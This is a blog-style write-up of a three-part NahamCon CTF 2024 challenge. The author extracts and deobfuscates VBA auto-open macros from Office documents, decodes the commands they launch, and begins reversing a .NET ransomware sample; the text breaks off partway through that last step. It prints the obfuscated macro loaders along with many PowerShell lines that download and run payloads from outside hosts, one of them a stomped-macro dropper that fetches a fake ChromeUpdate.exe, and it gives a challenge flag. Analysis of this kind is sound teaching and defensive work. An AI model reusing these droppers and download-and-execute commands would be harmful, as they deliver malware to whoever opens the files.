NahamCon CTF 2024 - Macro Madness
My first time trying an AI-generated image. Don't laugh ??

NahamCon CTF 2024 - Macro Madness

Tim M. Tim M.

Tim M.

Software engineer looking to relocate to Japan! Visa-eligible

发布日期: 2024年5月25日
+ 关注

Well this was a fun one!

This is a three part challenge, where each individual part awards its own points, and the challenges build on each other.

Also, let it be known I was the 9th out of 40 teams to solve these, granting me the full 1500/1500 points! I did a whole bunch of stuff out of my usual area, so I hope it's okay to feel proud ??. This was a really fun challenge -- actually probably the most fun one I've done ever!

Part 1

Macros. How do they work?

This sounds like fun! I've never looked at Office doc macro malware before. The provided zip file contains a bunch of xls and doc files. Some or all of these have macros, and many of the macros are apparently benign.

First, there's no way that I'm going to open these docs with macros, nor go through each of the 84 files manually to get them anyway. With a bit of googling, I found an article that covers the excellent oletools. If we, for instance, run olevba Advanced\ Potion\ Making\ for\ Housewives.doc, we get the following output: 

olevba 0.60.1 on Python 3.11.9 - https://decalage.info/python/oletools
===============================================================================
FILE: Advanced Potion Making for Housewives.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: Advanced Potion Making for Housewives.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: Advanced Potion Making for Housewives.doc - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Function achieve(believe)
    achieve = Chr(believe - 16)
End Function

Function retrieve(relieve)
    retrieve = Left(relieve, 3)
End Function

Function perceive(deceive)
    perceive = Right(deceive, Len(deceive) - 3)
End Function

Function receive(conceive)
    Do
        grieve = grieve + achieve(retrieve(conceive))
        conceive = perceive(conceive)
    Loop While Len(conceive) > 0
    receive = grieve
End Function

Function MyMacro()
    Dim thieve As String
    Dim sleeve As String
    
    thieve = "128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048126117132121126132130133116117130062121127048061096127130132048072064072064075048125131128113121126132062117136117075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123120113132127128131062115127125074072064072064"
    sleeve = receive(thieve)
    GetObject(receive("135121126125119125132131074")).Get(receive("103121126067066111096130127115117131131")).Create sleeve, reprieve, naive, believe

End Function

Great! Let's dump them all and figure the rest out later. Unfortunately, I'm not the best with Bash. In a moment of laziness, I went with PowerShell, since I'm fully competent in it. Creating a dump for each doc is as easy as... 

┌──(kali?kali)-[/home/kali/Downloads/macro-docs]
└─PS> ls | % { olevba $_ > ("dumps/" + $_ + ".vbadump") }

Let's get to figuring out what each do. First, there are a number of scripts that follow the pattern above: 

    thieve = "128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048126117132121126132130133116117130062121127048061096127130132048072064072064075048125131128113121126132062117136117075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123120113132127128131062115127125074072064072064"
    sleeve = receive(thieve)
    GetObject(receive("135121126125119125132131074")).Get(receive("103121126067066111096130127115117131131")).Create sleeve, reprieve, naive, believe

I found the easiest way to deobfuscate these was to create a simple VB.NET application, since VBA/VBScript are mostly portable to the more powerful VB variant. First, the 135121126125119125132131074 and 103121126067066111096130127115117131131 code is pretty consistent across many scripts, as opposed to the thieve values, so we'll do these two individually. 

Module Module1
    Function achieve(believe)
        achieve = Chr(believe - 16)
    End Function

    Function retrieve(relieve)
        retrieve = Left(relieve, 3)
    End Function

    Function perceive(deceive)
        perceive = Right(deceive, Len(deceive) - 3)
    End Function

    Function receive(conceive)
        Dim grieve
        Do
            grieve = grieve + achieve(retrieve(conceive))
            conceive = perceive(conceive)
        Loop While Len(conceive) > 0
        receive = grieve
    End Function

    Sub Main()
        Console.WriteLine(receive("135121126125119125132131074"))
        Console.WriteLine(receive("103121126067066111096130127115117131131"))


        Console.ReadLine()
    End Sub

End Module

And the values: 

winmgmts:
Win32_Process

Translated back: 

GetObject("winmgmts:").Get("Win32_Process")).Create sleeve, reprieve, naive, believe

So it's running a process! All those other thieve parts must be the actual calls. Let's extract them all and deobfuscate: 

    Sub Main()
        Dim thieve As String() = {
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048126117132121126132130133116117130062121127048061096127130132048072064072064075048125131128113121126132062117136117075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123120113132127128131062115127125074072064072064",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048131132117113124132120113115115117131131062115127125048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063117136128124127121132115117126132130113124062126117132074068068067075048115125116048063115048116121130",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063114113115123116127127130115127126132130127124062114121138075048100117131132061094117132083127126126117115132121127126048114113115123116127127130115127126132130127124062114121138048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063117136128124127121132126117132135127130123062121127074068068067",
"126117132131132113132048061113126",
"132113131123124121131132",
"132130113115117130132048072062072062072062072",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048130127119133117131137131113116125121126062114121138048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063130117116132117113125116117128124127137062115127125074068068067075048100117131132061094117132083127126126117115132121127126048130117116132117113125116117128124127137062115127125048061096127130132048072064072064",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115121128120117130127128117130113132121127126131062126117132048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063125113124115127116117117136115120113126119117062121127075048126127132117128113116062117136117",
"128127135117130115118119048063114113132132117130137130117128127130132",
"118121126116131132130048063121048050117130130127130050048083074108103121126116127135131108092127119131108083082099108083082099062124127119",
"131115120132113131123131048063129133117130137048063118127048092089099100048063134",
"128127135117130131120117124124048081116116061083127126132117126132048061096113132120048050083074108100117125128108124127119062132136132050048061102113124133117048050094117135048124127119048117126132130137050",
"128127135117130131120117124124048098117125127134117061089132117125048061096113132120048050083074108100117125128108124127119062132136132050",
"128127135117130131120117124124048087117132061103121126085134117126132048061092127119094113125117048081128128124121115113132121127126048061093113136085134117126132131048069",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048120113115123117130131128113115117062127130119048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063125113124121115121127133131115127126132130127124062126117132074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115127134117130132127128131115117126132117130062115127125",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048117136128124127121132126117132135127130123062121127048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063133126116117130119130127133126116127128131062126117132075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063115137114117130115127125125113126116128127131132062127130119074068068067",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063138117130127116113137124113114131062115127125075048100117131132061094117132083127126126117115132121127126048138117130127116113137124113114131062115127125048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063115121128120117130127128117130113132121127126131062126117132074068068067",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048121126118121124132130113132117126117132135127130123062127130119048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063116113130123135117114115127126126117115132062115127125075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063130117125127132117117136128124127121132062126117132",
"132137128117048083074108103121126116127135131108099137131132117125067066108116130121134117130131108117132115108120127131132131",
"117115120127048053133131117130126113125117053",
"130127133132117048128130121126132",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063117136113125128124117062115127125",
"128127135117130131120117124124048087117132061103125121095114122117115132048061083124113131131048103121126067066111095128117130113132121126119099137131132117125",
"128127135117130131120117124124048087117132061083120121124116089132117125048061096113132120048083074108048061098117115133130131117",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063116113130123126117132115127126126117115132121127126131062115127125075048126127132117128113116062117136117075048100117131132061094117132083127126126117115132121127126048116113130123126117132115127126126117115132121127126131062115127125048061096127130132048072064",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048130117125127132117117136128124127121132062126117132048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114113115123116127127130117126132130137062127130119074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115124127113123113126116116113119119117130062121127",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048121126134121131121114124117120113126116124117130131062115127125048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063131117115130117132131117131131121127126131062127130119075048131115048131132113130132048135133113133131117130134",
"126117132131132113132048061113126127048140048118121126116131132130048074072064",
"113130128048061113",
"135120127113125121",
"128127135117130131120117124124048099117132061085136117115133132121127126096127124121115137048098117125127132117099121119126117116",
"128127135117130131120117124124048087117132061096130127115117131131048140048099127130132061095114122117115132048083096101048061084117131115117126116121126119048140048099117124117115132061095114122117115132048061086121130131132048065064",
"128127135117130131120117124124048098117131132113130132061083127125128133132117130048061086127130115117",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063125113124121115121127133131120133114062114121138075048131115048131132127128048135133113133131117130134075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063126117132121126132130133116117130062121127",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123127128131113115115117131131062121127074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063116113130123115137114117130126117132062115127125075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055115125116062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048073096093048061084113121124137057",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115127134117130132127128131115117126132117130062115127125048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063131120113116127135121126118130113131132130133115132133130117062127130119074072064072064075048125131128113121126132062117136117",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115137114117130131132117113124132120062127130119048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115137114117130131132117113124132120062127130119075048115113124115062117136117",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115066115127125125113126116062126117132075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055126127132117128113116062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048071081093048061084113121124137057075048100117131132061094117132083127126126117115132121127126048115066115127125125113126116062126117132048061096127130132048072064",
"128127135117130131120117124124048094117135061089132117125048061096113132120048050083074108100117125128050048061089132117125100137128117048084121130117115132127130137",
"128127135117130131120117124124048083127128137061089132117125048061096113132120048050083074108100117125128050048061084117131132121126113132121127126048050084074108082113115123133128050048061098117115133130131117",
"128127135117130131120117124124048099132113130132061096130127115117131131048061086121124117096113132120048050126127132117128113116062117136117050048061081130119133125117126132092121131132048050083074108100117125128108132117131132062132136132050",
"118131133132121124048118131121126118127048116130121134117131",
"132113131123123121124124048063086048063089093048126127132117128113116062117136117",
"135117134132133132121124048129117048099137131132117125048063115074065064048063130116074132130133117048063118074132117136132",
"135125121115048129118117048124121131132048114130121117118048063118127130125113132074132113114124117",
"116121131123128113130132048063131048131115130121128132062132136132",
"130117119048129133117130137048050088091092093108099127118132135113130117108093121115130127131127118132108103121126116127135131108083133130130117126132102117130131121127126108098133126050",
"128127135117130131120117124124048099132113130132061099117130134121115117048061094113125117048050135133113133131117130134050",
"128127135117130131120117124124048099132127128061099117130134121115117048061094113125117048050135133113133131117130134050",
"128127135117130131120117124124048098117131132113130132061099117130134121115117048061094113125117048050099128127127124117130050",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063131120113116127135131117130134117130062126117132075048131115048131132113130132048135133113133131117130134075048100117131132061094117132083127126126117115132121127126048131120113116127135131117130134117130062126117132048061096127130132048068068067",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115127134117130132115127126132130127124062126117132075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063127114131115133130117127128131062127130119074072064072064075048131115048131132127128048131128127127124117130",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115137114117130115127125125113126116115117126132117130062126117132075048100117131132061094117132083127126126117115132121127126048115137114117130115127125125113126116115117126132117130062126117132048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063121126134121131121114124117120113126116124117130131062115127125074068068067",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048116113130123115137114117130126117132062115127125048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063131132117113124132120126117132135127130123062121127075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063120113115123117130131128113115117062127130119",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063128113137124127113116116121131128113132115120062127130119074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063131132117113124132120113115115117131131062115127125075048131115048131132113130132048131128127127124117130",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063119120127131132121126118130113131132130133115132133130117062121127075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063130127119133117131137131113116125121126062114121138075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055115113124115062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048070096093048061084113121124137057",
"116121130",
"121128115127126118121119048063113124124",
"128121126119048119127127119124117062115127125",
"132117124126117132048132127135117124062114124121126123117126124121119120132131062126124",
"126117132048133131117048106074048108108118121124117131117130134117130108131120113130117116",
"131120133132116127135126048063130048063132048064",
"126131124127127123133128048117136113125128124117062115127125",
"131137131132117125121126118127",
"126117132048133131117130",
"128127135117130131120117124124048087117132061096130127115117131131",
"128127135117130131120117124124048087117132061099117130134121115117",
"128127135117130131120117124124048087117132061085134117126132092127119048061092127119094113125117048099137131132117125048061094117135117131132048065064",
"131115048129133117130137048131132113132117077048113124124",
"119128133128116113132117048063118127130115117",
"131118115048063131115113126126127135",
"128127135117130131120117124124048087117132061094117132089096083127126118121119133130113132121127126",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048119127127119124117062115127125",
"128127135117130131120117124124048087117132061083127125125113126116048061093127116133124117048094117132100083096089096",
"128127135117130131120117124124048089126134127123117061098117131132093117132120127116048061101130121048050120132132128131074063063113128121062119121132120133114062115127125063130117128127131063128127135117130131120117124124063128127135117130131120117124124050",
"128127135117130131120117124124048100117131132061083127126126117115132121127126048061083127125128133132117130094113125117048072062072062072062072",
"128127135117130131120117124124048087117132061083127126132117126132048061096113132120048050083074108103121126116127135131108099137131132117125067066108116130121134117130131108117132115108120127131132131050",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048050120132132128074063063117136113125128124117062115127125050048061095133132086121124117048050083074108100117125128108117136113125128124117062120132125124050",
"128127135117130131120117124124048094117135061099125114099120113130117048061094113125117048050100117125128099120113130117050048061096113132120048050083074108100117125128050048061086133124124081115115117131131048085134117130137127126117",
"128127135117130131120117124124048098117125127134117061099125114099120113130117048061094113125117048050100117125128099120113130117050",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063120121116116117126115127125125131062114121138074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063121126118121124132130113132117126117132135127130123062127130119075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055125131128113121126132062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048072081093048061084113121124137057",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115124127113123113126116116113119119117130062121127048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063133126116117132117115132113114124117127128131062114121138074072064072064075048115113124115062117136117"
        }

        For Each x In thieve
            Console.WriteLine(receive(x))
        Next

        Console.ReadLine()
    End Sub

And the calls: 

powershell Test-NetConnection netintruder.io -Port 8080; mspaint.exe; Invoke-WebRequest -Uri https://blackhatops.com:8080
powershell Test-NetConnection stealthaccess.com -Port 8080; Invoke-WebRequest -Uri https://exploitcentral.net:443; cmd /c dir
powershell Invoke-WebRequest -Uri https://backdoorcontrol.biz; Test-NetConnection backdoorcontrol.biz -Port 80; Invoke-WebRequest -Uri https://exploitnetwork.io:443
netstat -an
tasklist
tracert 8.8.8.8
powershell Test-NetConnection roguesysadmin.biz -Port 443; Invoke-WebRequest -Uri https://redteamdeploy.com:443; Test-NetConnection redteamdeploy.com -Port 8080
powershell Test-NetConnection cipheroperations.net -Port 8080; Invoke-WebRequest -Uri https://malcodeexchange.io; notepad.exe
powercfg /batteryreport
findstr /i "error" C:\Windows\Logs\CBS\CBS.log
schtasks /query /fo LIST /v
powershell Add-Content -Path "C:\Temp\log.txt" -Value "New log entry"
powershell Remove-Item -Path "C:\Temp\log.txt"
powershell Get-WinEvent -LogName Application -MaxEvents 5
powershell Test-NetConnection hackerspace.org -Port 443; Invoke-WebRequest -Uri https://maliciouscontrol.net:443; Invoke-WebRequest -Uri https://covertopscenter.com
powershell Test-NetConnection exploitnetwork.io -Port 8080; Invoke-WebRequest -Uri https://undergroundops.net; Invoke-WebRequest -Uri https://cybercommandpost.org:443
powershell Invoke-WebRequest -Uri https://zerodaylabs.com; Test-NetConnection zerodaylabs.com -Port 80; Invoke-WebRequest -Uri https://cipheroperations.net:443
powershell Test-NetConnection infiltratenetwork.org -Port 80; Invoke-WebRequest -Uri https://darkwebconnect.com; Invoke-WebRequest -Uri https://remoteexploit.net
type C:\Windows\System32\drivers\etc\hosts
echo %username%
route print
powershell Invoke-WebRequest -Uri https://example.com
powershell Get-WmiObject -Class Win32_OperatingSystem
powershell Get-ChildItem -Path C:\ -Recurse
powershell Invoke-WebRequest -Uri https://darknetconnections.com; notepad.exe; Test-NetConnection darknetconnections.com -Port 80
powershell Test-NetConnection remoteexploit.net -Port 443; Invoke-WebRequest -Uri https://backdoorentry.org:443; Invoke-WebRequest -Uri https://cloakanddagger.io
powershell Test-NetConnection invisiblehandlers.com -Port 8080; Invoke-WebRequest -Uri https://secretsessions.org; sc start wuauserv
netstat -ano | findstr :80
arp -a
whoami
powershell Set-ExecutionPolicy RemoteSigned
powershell Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
powershell Restart-Computer -Force
powershell Invoke-WebRequest -Uri https://malicioushub.biz; sc stop wuauserv; Invoke-WebRequest -Uri https://netintruder.io
powershell Invoke-WebRequest -Uri https://blackopsaccess.io:443; Invoke-WebRequest -Uri https://darkcybernet.com; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -Trigger (New-ScheduledTaskTrigger -At 9PM -Daily)
powershell Test-NetConnection covertopscenter.com -Port 8080; Invoke-WebRequest -Uri https://shadowinfrastructure.org:8080; mspaint.exe
powershell Test-NetConnection cyberstealth.org -Port 443; Invoke-WebRequest -Uri https://cyberstealth.org; calc.exe
powershell Invoke-WebRequest -Uri https://c2command.net; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'notepad.exe') -Trigger (New-ScheduledTaskTrigger -At 7AM -Daily); Test-NetConnection c2command.net -Port 80
powershell New-Item -Path "C:\Temp" -ItemType Directory
powershell Copy-Item -Path "C:\Temp" -Destination "D:\Backup" -Recurse
powershell Start-Process -FilePath "notepad.exe" -ArgumentList "C:\Temp\test.txt"
fsutil fsinfo drives
taskkill /F /IM notepad.exe
wevtutil qe System /c:10 /rd:true /f:text
wmic qfe list brief /format:table
diskpart /s script.txt
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
powershell Start-Service -Name "wuauserv"
powershell Stop-Service -Name "wuauserv"
powershell Restart-Service -Name "Spooler"
powershell Invoke-WebRequest -Uri https://shadowserver.net; sc start wuauserv; Test-NetConnection shadowserver.net -Port 443
powershell Invoke-WebRequest -Uri https://covertcontrol.net; Invoke-WebRequest -Uri https://obscureops.org:8080; sc stop spooler
powershell Invoke-WebRequest -Uri https://cybercommandcenter.net; Test-NetConnection cybercommandcenter.net -Port 80; Invoke-WebRequest -Uri https://invisiblehandlers.com:443
powershell Test-NetConnection darkcybernet.com -Port 80; Invoke-WebRequest -Uri https://stealthnetwork.io; Invoke-WebRequest -Uri https://hackerspace.org
powershell Invoke-WebRequest -Uri https://payloaddispatch.org:443; Invoke-WebRequest -Uri https://stealthaccess.com; sc start spooler
powershell Invoke-WebRequest -Uri https://ghostinfrastructure.io; Invoke-WebRequest -Uri https://roguesysadmin.biz; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'calc.exe') -Trigger (New-ScheduledTaskTrigger -At 6PM -Daily)
dir
ipconfig /all
ping google.com
telnet towel.blinkenlights.nl
net use Z: \\fileserver\shared
shutdown /r /t 0
nslookup example.com
systeminfo
net user
powershell Get-Process
powershell Get-Service
powershell Get-EventLog -LogName System -Newest 10
sc query state= all
gpupdate /force
sfc /scannow
powershell Get-NetIPConfiguration
powershell Test-NetConnection google.com
powershell Get-Command -Module NetTCPIP
powershell Invoke-RestMethod -Uri "https://api.github.com/repos/powershell/powershell"
powershell Test-Connection -ComputerName 8.8.8.8
powershell Get-Content -Path "C:\Windows\System32\drivers\etc\hosts"
powershell Invoke-WebRequest -Uri "https://example.com" -OutFile "C:\Temp\example.html"
powershell New-SmbShare -Name "TempShare" -Path "C:\Temp" -FullAccess Everyone
powershell Remove-SmbShare -Name "TempShare"
powershell Invoke-WebRequest -Uri https://hiddencomms.biz:443; Invoke-WebRequest -Uri https://infiltratenetwork.org; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'mspaint.exe') -Trigger (New-ScheduledTaskTrigger -At 8AM -Daily)
powershell Test-NetConnection cloakanddagger.io -Port 8080; Invoke-WebRequest -Uri https://undetectableops.biz:8080; calc.exe

The most alarming thing some of these do is make some web requests, but nothing is actually saved nor executed. Let's leave them for now and find some other interesting ones.

A few look something like this: 

Sub MyMacros()
    Dim str As String
    str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://netintruder.io/command.ps1')"
    Shell str, vbHide
    Wait (2)
End Sub

With other variations: 

str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://netintruder.io/command.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadString('https://shadowserver.net/inject.ps1') | iex"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://darknetconnections.com/malware.exe', 'malware.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://redteamdeploy.com/shell.ps1')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://hiddencomms.biz/initiate.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://exploitcentral.net/exploit.exe', 'exploit.exe')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://malcodeexchange.io/agent.exe', 'agent.exe')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://obscureops.org/dropper.exe', 'dropper.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://payloaddispatch.org/runme.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://c2command.net/backdoor.exe', 'backdoor.exe')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://malicioushub.biz/trojan.exe', 'trojan.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://cyberstealth.org/payload.ps1')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://undergroundnet.org/loader.ps1')"
str = "powershell New-Object System.Net.WebClient).DownloadFile('https://blackopsaccess.io/spyware.exe', 'spyware.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://zerodaylabs.com/hack.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://roguesysadmin.biz/virus.exe', 'virus.exe')"

Some of these just download files, and many execute them (via iex). I tried curling them all, but none of them exist! Maybe they did before ??. For now, let's see what else there is. Actually, there's exactly one more! 

VBA MACRO VBA_P-code.txt 
in file: VBA P-code - OLE stream: 'VBA P-code'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' Processing file: Space Pirate Code of Conduct.doc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 938 bytes
' Macros/VBA/Module1 - 4293 bytes
' Line #0:
' 	FuncDefn (Function Sleep(ByVal mili As Long) As Long)
' Line #1:
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	ArgsCall MyMacro 0x0000 
' Line #4:
' 	EndSub 
' Line #5:
' Line #6:
' 	FuncDefn (Sub Document_Open())
' Line #7:
' 	ArgsCall MyMacro 0x0000 
' Line #8:
' 	EndSub 
' Line #9:
' Line #10:
' 	FuncDefn (Function achieve(believe))
' Line #11:
' 	Ld believe 
' 	LitDI2 0x0010 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	St achieve 
' Line #12:
' 	EndFunc 
' Line #13:
' Line #14:
' 	FuncDefn (Function retrieve(relieve))
' Line #15:
' 	Ld relieve 
' 	LitDI2 0x0003 
' 	ArgsLd Left 0x0002 
' 	St retrieve 
' Line #16:
' 	EndFunc 
' Line #17:
' Line #18:
' 	FuncDefn (Function perceive(deceive))
' Line #19:
' 	Ld deceive 
' 	Ld deceive 
' 	FnLen 
' 	LitDI2 0x0003 
' 	Sub 
' 	ArgsLd Right 0x0002 
' 	St perceive 
' Line #20:
' 	EndFunc 
' Line #21:
' Line #22:
' 	FuncDefn (Function receive(conceive))
' Line #23:
' 	Do 
' Line #24:
' 	Ld grieve 
' 	Ld conceive 
' 	ArgsLd retrieve 0x0001 
' 	ArgsLd achieve 0x0001 
' 	Add 
' 	St grieve 
' Line #25:
' 	Ld conceive 
' 	ArgsLd perceive 0x0001 
' 	St conceive 
' Line #26:
' 	Ld conceive 
' 	FnLen 
' 	LitDI2 0x0000 
' 	Gt 
' 	LoopWhile 
' Line #27:
' 	Ld grieve 
' 	St receive 
' Line #28:
' 	EndFunc 
' Line #29:
' Line #30:
' 	FuncDefn (Function MyMacro())
' Line #31:
' 	Dim 
' 	VarDefn thieve (As String)
' Line #32:
' 	Dim 
' 	VarDefn sleeve (As String)
' Line #33:
' Line #34:
' 	LitStr 0x0306 "128127135117130131120117124124048056089126134127123117061103117114098117129133117131132048055120132132128074063063134134121126116127135131133128116113132117062115127125074072064072064063133128116113132117055048061101131117082113131121115096113130131121126119048061088117113116117130131048080139055120117113130132114117113132055077055073072072069114072064064070067114114071114113071068118071069114070118072113118118066073065114115073065115118113072117114071071116073068066116068067067115073065071072113113073117073073115070118055141048061095133132086121124117048055083074108103121126116127135131108100113131123131108083120130127125117101128116113132117062117136117055057075048083074108103121126116127135131108100113131123131108083120130127125117101128116113132117062117136117"
' 	St thieve 
' Line #35:
' 	Ld thieve 
' 	ArgsLd receive 0x0001 
' 	St sleeve 
' Line #36:
' 	Ld sleeve 
' 	Ld reprieve 
' 	Ld naive 
' 	Ld believe 
' 	LitStr 0x0027 "103121126067066111096130127115117131131"
' 	ArgsLd receive 0x0001 
' 	LitStr 0x001B "135121126125119125132131074"
' 	ArgsLd receive 0x0001 
' 	ArgsLd GetObject 0x0001 
' 	ArgsMemLd Get 0x0001 
' 	ArgsMemCall Create 0x0004 
' Line #37:
' Line #38:
' 	EndFunc 
' Line #39:

According to google, this P-Code is bytecode inserted into the document by a process typically called VBA Stomping. There is a tool that can decompile the bytecode back to VBA, though, due to the method we used to investigate, we don't need it in practice. I still did it anyway to confirm, though! If we use that tool, we get code that looks identical to the first pattern we investigated, where we decode it via the receive function we ported to VB.NET. If we decode it...

领英推荐

powershell (Invoke-WebRequest 'https://vvindowsupdate.com:8080/update' -UseBasicParsing -Headers @{'heartbeat'='9885b80063bb7ba74f75b6f8aff291bc91cfa8eb77d942d433c9178aa9e99c6f'} -OutFile 'C:\Windows\Tasks\ChromeUpdate.exe'); C:\Windows\Tasks\ChromeUpdate.exe

If we try to access this url with this header, we actually get something! Actually two things. First, we get the ChromeUpdate.exe file which, as you might expect, is not the application for updating Chrome. We also get a flag!

flag{734b55458dc74fb6d5f5a5082a3920d6}

Part 2

So let's crack open that file we downloaded

Luckily, .NET is my specialty, so reverse engineering this application shouldn't be a problem. That and decompilation tools are abundant ??. If we use strings on the file, we find a bunch that point to .NET Core. 

...
RansomwareUsingAES-CTR.runtimeconfig.json
RansomwareUsingAES-CTR.dll
!System.Collections.Concurrent.dll
 System.Collections.Immutable.dll
!System.Diagnostics.StackTrace.dll
System.IO.Compression.dll
System.IO.MemoryMappedFiles.dll
System.Private.CoreLib.dll
System.Reflection.Metadata.dll
 System.Security.Cryptography.dll
 RansomwareUsingAES-CTR.deps.json

What's interesting here is that there appears to be a dll associated with this exe, which makes this a bundled exe. Let's first use ILSpy to open the file.

Note: I had called it stuff.dll at the time

If we right-click RandomwareUsingAES-CTR, we can Extract Package Assembly, then load it right back in. Here's the relevant code: 

	private static void Main()
	{
		List<FileInfo> list = new List<FileInfo>();
		FileEnumeration("C:\\Users\\lenovo\\Desktop\\FilesToEncrypt", list);
